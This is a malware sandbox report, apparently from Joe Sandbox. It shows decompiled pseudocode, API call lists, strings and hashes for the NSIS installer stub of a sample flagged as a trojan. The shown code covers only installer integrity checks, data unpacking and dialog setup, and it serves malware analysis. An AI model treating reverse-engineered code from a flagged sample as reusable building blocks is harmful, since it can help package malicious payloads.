SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c7c
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e5c
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,758D3420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
RichEdit, xrefs: 00403E47
RichEdit20W, xrefs: 00403E38, 00403E3E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
RichEd20, xrefs: 00403E1A
1033, xrefs: 00403C0C, 00403C68
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
.exe, xrefs: 00403CFA
.DEFAULT\Control Panel\International, xrefs: 00403C58
_Nb, xrefs: 00403D70, 00403DD8
C:\Users\user\AppData\Local\Temp, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
RichEd32, xrefs: 00403E28

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1862882193
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040653D(0x444000, E00405E58(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x94bc4
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0x94bc8
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030d8
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

soft, xrefs: 0040316B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Error launching installer, xrefs: 004030CD
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
}8@, xrefs: 00403227, 00403242
Null, xrefs: 00403174
Inst, xrefs: 00403162

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-4026076814
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x4231b5
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x4231b5
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x004034bd
0x004034bd
0x00000000
0x0040330e
0x00403312
0x0040346a
0x004034ad
0x004034af
0x004034af
0x004034bb
0x004034c2
0x004034c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346f
0x00000000
0x00000000
0x00403471
0x00403474
0x00403477
0x0040347a
0x0040347c
0x0040347c
0x0040348c
0x00000000
0x00000000
0x0040349a
0x00403464
0x00403464
0x004034bf
0x004034bf
0x00000000
0x004034bf
0x0040349c
0x0040349f
0x004034a6
0x00000000
0x00000000
0x00000000
0x004034a8
0x00000000
0x00403474
0x0040331e
0x00403320
0x00403327
0x0040332e
0x0040332e
0x00403335
0x0040333d
0x00403347
0x0040334c
0x00403354
0x0040335e
0x00403361
0x00000000
0x00000000
0x00000000
0x00000000
0x00403367
0x00403367
0x00403367
0x0040336f
0x00403371
0x00403371
0x00403382
0x00000000
0x00000000
0x00403388
0x0040338b
0x00403391
0x00403397
0x00403397
0x004033a2
0x004033a8
0x004033ad
0x004033b4
0x004033b7
0x00000000
0x00000000
0x004033bd
0x004033c3
0x004033c5
0x004033ce
0x004033d0
0x00403401
0x00403407
0x00403413
0x00403418
0x00403418
0x0040341d
0x00403458
0x00000000
0x00000000
0x00000000
0x0040341f
0x00403423
0x0040343a
0x0040343f
0x00403442
0x00403445
0x00403448
0x0040344c
0x00000000
0x00000000
0x00000000
0x00403452
0x0040342c
0x00403433
0x00000000
0x00000000
0x00403435
0x00000000
0x00403435
0x0040341d
0x00403460
0x00000000
0x00403460
0x00000000
0x00403367

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
